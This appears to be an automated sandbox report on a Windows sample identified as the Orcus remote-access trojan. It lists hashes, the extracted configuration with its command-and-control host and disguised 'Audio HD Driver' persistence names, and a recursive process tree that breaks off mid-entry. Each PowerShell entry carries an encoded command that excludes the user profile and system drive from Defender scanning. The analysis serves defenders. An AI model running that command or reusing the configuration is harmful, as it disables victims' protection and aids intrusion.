Analysis

  • max time kernel
    31s
  • max time network
    30s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-12-2024 17:58

General

  • Target

    GHOSTYFN.exe

  • Size

    6.1MB

  • MD5

    73c7cc676ab19d426f2745ef261d6349

  • SHA1

    f217a78eb2beddcbf5bb00c229a96f9ffaa98a0d

  • SHA256

    4a513270a4d7e85bdc8dfe9adea3b190cfc055e562060c2be9389336333864a0

  • SHA512

    40f69adef5b8de42283ff0539cf0f0259ed9d23baa4e87c63e594fe12ca7f35e73dc3a0d6a66dd13a584d0e1569940026bc49d41f95a1f23c0c3fd810613ad36

  • SSDEEP

    98304:BwalpQAdxjrQaMQZZV4g0rvnkVKg9JmcDiCwGDz+Uog9XhhFyoL:JjTrusV4fvuH938Sn9X9t

Malware Config

Extracted

Family

orcus

C2

another-contains.gl.at.ply.gg

Mutex

a49af69032c94d6fa7c0d2639d32f038

Attributes
  • administration_rights_required

    false

  • anti_debugger

    false

  • anti_tcp_analyzer

    false

  • antivm

    false

  • autostart_method

    1

  • change_creation_date

    false

  • force_installer_administrator_privileges

    false

  • hide_file

    false

  • install

    false

  • installation_folder

    %appdata%\Microsoft\Speech\AudioDriver.exe

  • installservice

    false

  • keylogger_enabled

    false

  • newcreationdate

    12/24/2024 02:03:43

  • plugins

    AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEgYgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMAMABmADAANwAzAAIAAAACAg==

  • reconnect_delay

    10000

  • registry_autostart_keyname

    Audio HD Driver

  • registry_hidden_autostart

    false

  • set_admin_flag

    false

  • tasksch_name

    Audio HD Driver

  • tasksch_request_highest_privileges

    false

  • try_other_autostart_onfail

    false

aes.plain

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
    "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:760
    • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
      "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3840
      • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
        "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5100
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
          4⤵
            PID:1588
          • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
            "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1516
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
              5⤵
                PID:4512
              • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                5⤵
                  PID:3420
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                    6⤵
                      PID:4052
                    • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                      "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                      6⤵
                        PID:1276
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                          7⤵
                            PID:4472
                          • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                            "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                            7⤵
                              PID:3060
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                8⤵
                                  PID:4332
                                • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                  8⤵
                                    PID:4344
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                      9⤵
                                        PID:2240
                                      • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                        "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                        9⤵
                                          PID:4836
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                            10⤵
                                              PID:1980
                                            • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                              "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                              10⤵
                                                PID:2768
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                  11⤵
                                                    PID:1276
                                                  • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                    11⤵
                                                      PID:2320
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                        12⤵
                                                          PID:1648
                                                        • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                          12⤵
                                                            PID:3064
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                              13⤵
                                                                PID:2312
                                                              • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                13⤵
                                                                  PID:1492
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                    14⤵
                                                                      PID:4780
                                                                    • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                      14⤵
                                                                        PID:4612
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                          15⤵
                                                                            PID:3544
                                                                          • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                            15⤵
                                                                              PID:556
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                16⤵
                                                                                  PID:3392
                                                                                • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                  16⤵
                                                                                    PID:4144
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                      17⤵
                                                                                        PID:1096
                                                                                      • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                        17⤵
                                                                                          PID:1484
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                            18⤵
                                                                                              PID:5024
                                                                                            • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                              18⤵
                                                                                                PID:5060
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                  19⤵
                                                                                                    PID:5212
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                    19⤵
                                                                                                      PID:5244
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                        20⤵
                                                                                                          PID:5504
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                          20⤵
                                                                                                            PID:5576
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                              21⤵
                                                                                                                PID:5840
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                21⤵
                                                                                                                  PID:5872
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                    22⤵
                                                                                                                      PID:5144
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                      22⤵
                                                                                                                        PID:2036
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                          23⤵
                                                                                                                            PID:4388
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                            23⤵
                                                                                                                              PID:5540
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                24⤵
                                                                                                                                  PID:5928
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                  24⤵
                                                                                                                                    PID:6008
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                      25⤵
                                                                                                                                        PID:5976
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                        25⤵
                                                                                                                                          PID:5084
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                            26⤵
                                                                                                                                              PID:5348
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                              26⤵
                                                                                                                                                PID:5916
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                  27⤵
                                                                                                                                                    PID:6104
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                    27⤵
                                                                                                                                                      PID:6080
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="
                                                                                                                                                        28⤵
                                                                                                                                                          PID:6040
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"
                                                                                                                                                          28⤵
                                                                                                                                                            PID:3900
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
